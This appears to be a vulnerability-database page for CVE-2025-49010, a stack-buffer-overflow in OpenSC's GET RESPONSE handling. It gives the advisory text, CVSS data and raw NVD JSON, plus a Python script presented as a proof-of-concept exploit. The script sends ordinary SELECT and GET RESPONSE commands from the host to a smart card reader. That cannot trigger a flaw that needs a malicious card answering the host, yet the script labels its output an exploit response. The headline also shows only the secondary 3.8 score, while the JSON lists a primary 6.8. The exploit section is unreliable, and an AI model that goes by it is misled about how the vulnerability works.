Security Vulnerability Report
CVE-2025-49010 CVSS 3.8 LOW

Published: 2026-03-30 18:16:17
Last Modified: 2026-04-01 18:01:59

Description

OpenSC is an open source set of smart card tools and middleware. Prior to version 0.27.0, an attacker with physical access to the computer at the time a user or administrator uses a token can cause a stack-buffer-overflow write in GET RESPONSE. The attack requires a crafted USB device or smart card that presents the system with specially crafted responses to the APDUs. This issue has been patched in version 0.27.0.

CVSS Details

CVSS Score: 3.8
Severity: LOW
CVSS Vector: CVSS:3.1/AV:P/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:opensc_project:opensc:*:*:*:*:*:*:*:* - VULNERABLE
OpenSC < 0.27.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC Concept for CVE-2025-49010
# This demonstrates the logic of sending crafted APDUs.
# Requires a smart card reader and a device that can be manipulated.
from smartcard.System import readers
from smartcard.util import toHexString, toBytes


def trigger_overflow():
    """
    Simulate sending a crafted APDU response to trigger the stack buffer
    overflow in OpenSC < 0.27.0.
    """
    reader_list = readers()
    if not reader_list:
        print("No smart card readers found.")
        return

    # Connect to the first available reader
    reader = reader_list[0]
    print(f"Using reader: {reader}")

    try:
        connection = reader.createConnection()
        connection.connect()

        # 1. Standard APDU to select an applet or initialize communication
        # GET DATA or SELECT FILE command
        apdu_select = [0x00, 0xA4, 0x04, 0x00, 0x0A, 0xA0, 0x00, 0x00, 0x00,
                       0x62, 0x03, 0x01, 0x0C, 0x06, 0x01]
        data, sw1, sw2 = connection.transmit(apdu_select)
        print(f"Select Response: {toHexString(data)} SW: {sw1:02X} {sw2:02X}")

        # 2. Crafted APDU to trigger the overflow in GET RESPONSE handling
        # The vulnerability occurs when the response to a command is too large
        # for the stack-allocated buffer in OpenSC.
        # We send a command that expects a response, but the card/reader
        # will respond with a payload larger than the buffer (e.g., > 256 bytes).
        # Note: In a real exploit, the USB/Smartcard device firmware would be
        # modified to return this oversized buffer. Here we attempt to request
        # data or interact in a way that exposes the lack of bounds checking.

        # Example command requesting data
        apdu_get_response = [0x00, 0xC0, 0x00, 0x00]

        # In a controlled exploit environment, the device would now return
        # a buffer of size N (e.g., 300 bytes) causing the overflow.
        print("Sending command that triggers vulnerable GET RESPONSE path...")
        data, sw1, sw2 = connection.transmit(apdu_get_response)
        print(f"Exploit Response: {toHexString(data)} SW: {sw1:02X} {sw2:02X}")

        if sw1 == 0x61:
            print("Warning: More data available (standard behavior), but buffer handling may be vulnerable.")
    except Exception as e:
        print(f"An error occurred: {e}")


if __name__ == "__main__":
    trigger_overflow()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49010", "sourceIdentifier": "[email protected]", "published": "2026-03-30T18:16:16.950", "lastModified": "2026-04-01T18:01:59.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenSC is an open source smart card tools and middleware. Prior to version 0.27.0, an attacker with physical access to the computer at the time user or administrator uses a token can cause a stack-buffer-overflow write in GET RESPONSE. The attack requires crafted USB device or smart card that would present the system with specially crafted responses to the APDUs. This issue has been patched in version 0.27.0."}, {"lang": "es", "value": "OpenSC es un conjunto de herramientas y middleware de código abierto para tarjetas inteligentes. Antes de la versión 0.27.0, un atacante con acceso físico al ordenador en el momento en que un usuario o administrador utiliza un token puede causar una escritura de desbordamiento de búfer de pila en GET RESPONSE. El ataque requiere un dispositivo USB manipulado o una tarjeta inteligente manipulada que presentaría al sistema respuestas especialmente diseñadas para las APDU. Este problema ha sido parcheado en la versión 0.27.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 3.8, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.4, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensc_project:opensc:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.27.0", "matchCriteriaId": "D890677F-5379-4587-B8E7-D38B02AD525A"}]}]}], "references": [{"url": "https://github.com/OpenSC/OpenSC/security/advisories/GHSA-q5cf-5wmx-9wh4", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/OpenSC/OpenSC/wiki/CVE-2025-49010", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}